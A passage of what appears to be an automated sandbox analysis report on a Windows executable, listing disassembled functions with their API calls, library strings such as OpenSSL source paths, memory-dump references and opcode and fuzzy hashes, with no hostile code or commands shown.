                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$0123456789ABCDEF$0123456789abcdef
                                  • API String ID: 1302938615-1078175416
                                  • Opcode ID: bc08dfdfe56748b3f5e818f98d3a386b91d3e0f86e7308e17c5177eb7b7fcd7c
                                  • Instruction ID: 17b90598f346e44ee1d1c850d23c136c01b2672ccf736f019041fe0b9e620b2d
                                  • Opcode Fuzzy Hash: bc08dfdfe56748b3f5e818f98d3a386b91d3e0f86e7308e17c5177eb7b7fcd7c
                                  • Instruction Fuzzy Hash: 0681C3716087919FDB18DE2A888572BBFE6BBC8780F44482CFAD5D3242D670DC45CB96
                                  Function 006751A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                  Download Yara Rule
                                  APIs
                                  • _strpbrk.LIBCMT ref: 006751F6
                                  • _free.LIBCMT ref: 00675313
                                    • Part of subcall function 006750C5: IsProcessorFeaturePresent.KERNEL32(00000017,006750B4,00000016,006749B2,0000002C,006CB098,0066CD7A,?,?,?,006750C1,00000000,00000000,00000000,00000000,00000000), ref: 006750C7
                                    • Part of subcall function 006750C5: GetCurrentProcess.KERNEL32(C0000417,006749B2,00000016,00674E1F,?,?,?), ref: 006750E9
                                    • Part of subcall function 006750C5: TerminateProcess.KERNEL32(00000000,?,?,?), ref: 006750F0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                  • String ID: *?$.
                                  • API String ID: 2812119850-3972193922
                                  • Opcode ID: c78284bbf221c474a7d616b8e6ea4b2ea25d5ef3c3db4b4717caa8f9e80413b6
                                  • Instruction ID: e2ee2971757427bbd5d58f702afd97c64e255727f49507cee953bc940944ceef
                                  • Opcode Fuzzy Hash: c78284bbf221c474a7d616b8e6ea4b2ea25d5ef3c3db4b4717caa8f9e80413b6
                                  • Instruction Fuzzy Hash: F4518175E006099FDF14DFA8C881AEDB7B6EF58310F2481ADE859E7341E7B19E018B50
                                  Function 0066E052 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066E1AB
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066E1C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: -f$-f
                                  • API String ID: 885266447-3269902443
                                  • Opcode ID: c4207259eb98b871702eab5af2aab2ea082859d3179b599ffc0d4b4b3ce9f4d2
                                  • Instruction ID: 73580ae21dead2e3bddedbf50d804f8d93a5004c812de67849a7b296a3d21905
                                  • Opcode Fuzzy Hash: c4207259eb98b871702eab5af2aab2ea082859d3179b599ffc0d4b4b3ce9f4d2
                                  • Instruction Fuzzy Hash: FB516C75E00248AFCF18DF58C884AAEBBB3EF99324F19C159E81897361D7729D51DB80
                                  Function 00668653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\win_gui.exe.exe,00000104), ref: 00668693
                                  • _free.LIBCMT ref: 0066875E
                                  • _free.LIBCMT ref: 00668768
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Users\user\Desktop\win_gui.exe.exe
                                  • API String ID: 2506810119-2541543497
                                  • Opcode ID: 179922cb134205e71fa1d48560cfb08c9d8fb0610d41329556422ae0552c13ff
                                  • Instruction ID: 337d0e167f166d0980451defba9277e0f2f6d5b4b17d728d98174daca87b7977
                                  • Opcode Fuzzy Hash: 179922cb134205e71fa1d48560cfb08c9d8fb0610d41329556422ae0552c13ff
                                  • Instruction Fuzzy Hash: 46317C71A05218AFCB21DFA9CC859AEBBBEEB85310B2041ABF404D7311DE709E41CB94
                                  Function 00660710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6,006D8978), ref: 00660757
                                  • GetConsoleMode.KERNEL32(00000000), ref: 0066075E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ConsoleHandleMode
                                  • String ID: conin$$conout$
                                  • API String ID: 674689721-2896197411
                                  • Opcode ID: 4ee98d9c085bca46a9d51a8ba3230f022f3ca746f3c3c2742451cc8139a89a89
                                  • Instruction ID: f6c8efaa3a85eea1eaa35390f2284608c7bce066b65c96bb422abb430c795d45
                                  • Opcode Fuzzy Hash: 4ee98d9c085bca46a9d51a8ba3230f022f3ca746f3c3c2742451cc8139a89a89
                                  • Instruction Fuzzy Hash: D8F081B0E422026AEB406BA8AC1AB767B67AB20705F05013BE0459A2A1FA71D5009B57
                                  Function 005C1000 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenA.KERNEL32 ref: 005C1021
                                  • lstrlenA.KERNEL32 ref: 005C102F
                                  • lstrlenA.KERNEL32 ref: 005C105A
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000001,00000001), ref: 005C1086
                                  • lstrlenA.KERNEL32 ref: 005C1097
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrlen$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 477651035-0
                                  • Opcode ID: 70a1c970dc7b7f178be0195d469cc6e69be8fbcc0d23deb6c19032cb8f5725ad
                                  • Instruction ID: b2809fb8c2f98896ce9fbe251b7ecb0b4689ff21e71b8ec8d874e28001ee14e7
                                  • Opcode Fuzzy Hash: 70a1c970dc7b7f178be0195d469cc6e69be8fbcc0d23deb6c19032cb8f5725ad
                                  • Instruction Fuzzy Hash: 1021B071A00616EFDB10DF94CC94FAEB7B9FF86360F1101A9D411A7241EB70AE02CB54
                                  Function 006786E0 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: __alldvrm$_strrchr
                                  • String ID:
                                  • API String ID: 1036877536-0
                                  • Opcode ID: 8006946c75c6fcf1c7f255cce8a48f3be255b242e49acd5b7eb7736965583298
                                  • Instruction ID: 2b3c39222c981480969bbb95d53d0e9fa0bb015aa822b30e1bc91209eec0da21
                                  • Opcode Fuzzy Hash: 8006946c75c6fcf1c7f255cce8a48f3be255b242e49acd5b7eb7736965583298
                                  • Instruction Fuzzy Hash: 73A157329803869FE7158F28C8957FEBBE6EF51310F2885ADE58D9B342CA348D41C756
                                  Function 0067E9CA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: b777423b2eb27fb0ceb68c0af0e219a7b5aaf1b04ab25ea5ea8a210cfcd8cb8d
                                  • Instruction ID: fce7d8145fe023a0a5dbbc2046fbaff911a98374abbf4f58b8528a3f44a2691e
                                  • Opcode Fuzzy Hash: b777423b2eb27fb0ceb68c0af0e219a7b5aaf1b04ab25ea5ea8a210cfcd8cb8d
                                  • Instruction Fuzzy Hash: 07414E31A001006BDB216BB88C45AEE3BA7FF49770F24C6DDF41DD7291E6764C4946A5
                                  Function 00674550 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fdf3f6c2d434f9f9b34ee1aa31af94de4e24b028ac7d0c2c6f92aa8fad186d3
                                  • Instruction ID: 0177e3528f326f0547f20a3b27d1c8c58b8490fd274fd10ec1805c0955e70b4e
                                  • Opcode Fuzzy Hash: 7fdf3f6c2d434f9f9b34ee1aa31af94de4e24b028ac7d0c2c6f92aa8fad186d3
                                  • Instruction Fuzzy Hash: 1E41EEB1A00704BFE724AF78CC45B9A7BEAEB45710F20C66EF155DB381DB7199418B84
                                  Function 006774BA Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000004,00000000,00000000,?,?,?,?,00000001,00000004,?,00000001,?), ref: 00677507
                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00677590
                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000004,?), ref: 006775A2
                                  • __freea.LIBCMT ref: 006775AB
                                    • Part of subcall function 0067718E: RtlAllocateHeap.NTDLL(00000000,?,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 006771C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                  • String ID:
                                  • API String ID: 2652629310-0
                                  • Opcode ID: 26c90e346a3fe1680504eacb7f6c5323d37a800d357a7e958f395baff5ef6755
                                  • Instruction ID: f3ca86c99247da9cee3ea750e42c75e7c6f6fc69cdacacaa845d94824a5f1550
                                  • Opcode Fuzzy Hash: 26c90e346a3fe1680504eacb7f6c5323d37a800d357a7e958f395baff5ef6755
                                  • Instruction Fuzzy Hash: 5131C172A1420AAFEF249F64DC45DEE7BAAEF40310F158229FC08D6250EB35CD55CBA0
                                  Function 00668AD4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fed664af913e2d03de16605eba29ad3fd53de8a6bc9532ce4acb8797e83a14ae
                                  • Instruction ID: 8a0c6817791c92549325f355d9e50b1b0d6a4cbe46f7365ee5348eabde06bb28
                                  • Opcode Fuzzy Hash: fed664af913e2d03de16605eba29ad3fd53de8a6bc9532ce4acb8797e83a14ae
                                  • Instruction Fuzzy Hash: D401F2F220960A3EE76016786CC5FA7631FDF813B8B31072AB535622D4DEA08C014264
                                  Function 006763AE Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00676355,?,00000000,00000000,00000000,?,00676614,00000006,FlsSetValue), ref: 006763E0
                                  • GetLastError.KERNEL32(?,00676355,?,00000000,00000000,00000000,?,00676614,00000006,FlsSetValue,006C64EC,FlsSetValue,00000000,00000364,?,00674E6E), ref: 006763EC
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00676355,?,00000000,00000000,00000000,?,00676614,00000006,FlsSetValue,006C64EC,FlsSetValue,00000000), ref: 006763FA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID:
                                  • API String ID: 3177248105-0
                                  • Opcode ID: 8f86619cd015957251f126037621b57fd11cd5f41043c3f9a7346517eb0f6e39
                                  • Instruction ID: e5e22c4c6fc0240319811641677b22de56eff8a88178ab332f4c7bf7cfe9de6f
                                  • Opcode Fuzzy Hash: 8f86619cd015957251f126037621b57fd11cd5f41043c3f9a7346517eb0f6e39
                                  • Instruction Fuzzy Hash: 9001D832615732ABCB318B68DC449963BDEAF157A1B20D720F90AD7280D720D802C7D0
                                  Function 005C8C37 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005C712C: EnterCriticalSection.KERNEL32(006D9A1C,00000001,00000000,005C8CEC,00000001,?,?,?,?,?,?,?,?,005C5A97), ref: 005C7131
                                    • Part of subcall function 005C712C: LeaveCriticalSection.KERNEL32(006D9A1C,?,?,?,?,?,?,?,?,005C5A97), ref: 005C7169
                                  • DeleteCriticalSection.KERNEL32(006D9A1C,?,75A8B390,005C5BDB), ref: 005C8C4C
                                  • DeleteCriticalSection.KERNEL32(006D9874), ref: 005C8C5B
                                  • DeleteCriticalSection.KERNEL32(006D99FC), ref: 005C8C6A
                                  • DeleteCriticalSection.KERNEL32(006D9898), ref: 005C8C8F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Delete$EnterLeave
                                  • String ID:
                                  • API String ID: 3104255891-0
                                  • Opcode ID: 0298b79626a7fc127998fa27a9bb3c858f35a15b2254a65969369dd8a19595fa
                                  • Instruction ID: 4d60880022e7c11d13695bb4c493691aea4ec9c67faf9d63f46f0856fa11b850
                                  • Opcode Fuzzy Hash: 0298b79626a7fc127998fa27a9bb3c858f35a15b2254a65969369dd8a19595fa
                                  • Instruction Fuzzy Hash: 29E01201F104661B47053AF82C59E7E0D5F9DCB71030D012FB202B73538D980C426AF6
                                  Function 006312F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 276COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _strncpy
                                  • String ID: ..\..\openssl-1.1.0f\crypto\x509\x509_obj.c$NO X509_NAME
                                  • API String ID: 2961919466-2144397184
                                  • Opcode ID: 6b077ced116aacbea8734848f99890beb0d2691326c6652170de8b09da489eaa
                                  • Instruction ID: dd9e96fb875c1fa6235fbc6c143bdbc3410f8aa6881e6e71eeff8f7c5aa6279b
                                  • Opcode Fuzzy Hash: 6b077ced116aacbea8734848f99890beb0d2691326c6652170de8b09da489eaa
                                  • Instruction Fuzzy Hash: DCA1D1716083459FD720DF58C886B6ABBE6BF86308F18446DF8898F342E775D9058B92
                                  Function 0066EF82 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 960044991246124babdcc123e8cefd963715f58865b8e388fd9866d6556f0bc2
                                  • Instruction ID: d5e328e12c9cf6991add39faa58d23f07259d0b25d674138125df21302768cd6
                                  • Opcode Fuzzy Hash: 960044991246124babdcc123e8cefd963715f58865b8e388fd9866d6556f0bc2
                                  • Instruction Fuzzy Hash: 0791E431D04149EBCF20DF68E8506EDBBB3EF56360F24867AE865A7381D6319D42CB61
                                  Function 00655210 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 0065529A
                                  Strings
